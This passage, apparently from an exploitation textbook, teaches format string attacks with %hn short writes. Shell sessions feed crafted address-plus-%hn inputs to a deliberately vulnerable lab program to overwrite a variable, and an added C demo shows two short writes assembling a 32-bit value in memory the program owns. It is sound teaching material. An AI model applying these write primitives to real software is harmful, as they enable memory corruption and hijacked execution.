Since the stack doesn't need to be printed to reach our addresses, the
number of bytes written at the first format parameter is 16. Direct parameter
access is only used for the %n parameters, since it really doesn't matter what
values are used for the %x spacers. This method simplifies the process of
writing an address and shrinks the mandatory size of the format string.
Using Short Writes
Another technique that can simplify format string exploits is using short
writes. A short is typically a two-byte word, and format parameters have a
special way of dealing with them. A more complete description of possible
format parameters can be found in the printf manual page. The portion
describing the length modifier is shown in the output below.
The length modifier
Here, integer conversion stands for d, i, o, u, x, or X conversion.
h A following integer conversion corresponds to a short int or
unsigned short int argument, or a following n conversion
corresponds to a pointer to a short int argument.
This can be used with format string exploits to write two-byte shorts. In
the output below, a short (shown in bold) is written at both ends of the
four-byte test_val variable. Naturally, direct parameter access can still be used.
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff 0015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 1441720 0x0015 ffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
reader@hacking:~/booksrc $
Using short writes, an entire four-byte value can be overwritten with just
two %hn parameters. In the example below, the test_val variable will be
overwritten once again with the address 0xbffffd72.
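As an added demonstration (not code from the book), the following C program stores through %hn into variables it owns, so it shows the two-byte behaviour the length-modifier excerpt describes and how two such stores, the second padded so the running count wraps modulo 0x10000, assemble a whole 32-bit value. The names hn_after and two_short_writes are chosen here, and the byte layout assumes a little-endian x86 target as in the book.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* hn_after: the value %hn stores after `pad` characters of output.  Only
 * the low 16 bits of the running character count survive the store into a
 * short.  "%*s" with an empty string emits exactly `pad` characters. */
unsigned short hn_after(unsigned pad)
{
    short stored = 0;
    char *buf = malloc(pad + 1);            /* padding plus the terminating NUL */
    if (buf == NULL)
        return 0;
    snprintf(buf, pad + 1, "%*s%hn", (int)pad, "", &stored);
    free(buf);
    return (unsigned short)stored;
}

/* two_short_writes: fills a 32-bit word this program owns with two %hn
 * stores.  The first store lands the low half after `low` characters; the
 * second adds just enough padding that the running count, taken modulo
 * 0x10000, equals the high half (the count cannot shrink, so it wraps
 * instead).  Layout assumes a little-endian target, as in the book's x86
 * examples (assumption made for this demonstration). */
uint32_t two_short_writes(uint16_t low, uint16_t high)
{
    union { uint32_t word; short half[2]; } t = { 0 };
    unsigned pad2 = ((unsigned)high - low) & 0xffffu;
    size_t len = (size_t)low + pad2 + 1;
    char *buf = malloc(len);
    if (buf == NULL)
        return 0;
    snprintf(buf, len, "%*s%hn%*s%hn",
             (int)low, "", &t.half[0], (int)pad2, "", &t.half[1]);
    free(buf);
    return t.word;
}

int main(void)
{
    printf("count 0x10015 stored through %%hn: 0x%04x\n", (unsigned)hn_after(0x10015));
    printf("two short writes: 0x%08x\n", (unsigned)two_short_writes(0xfd72, 0xbfff));
    return 0;
}
```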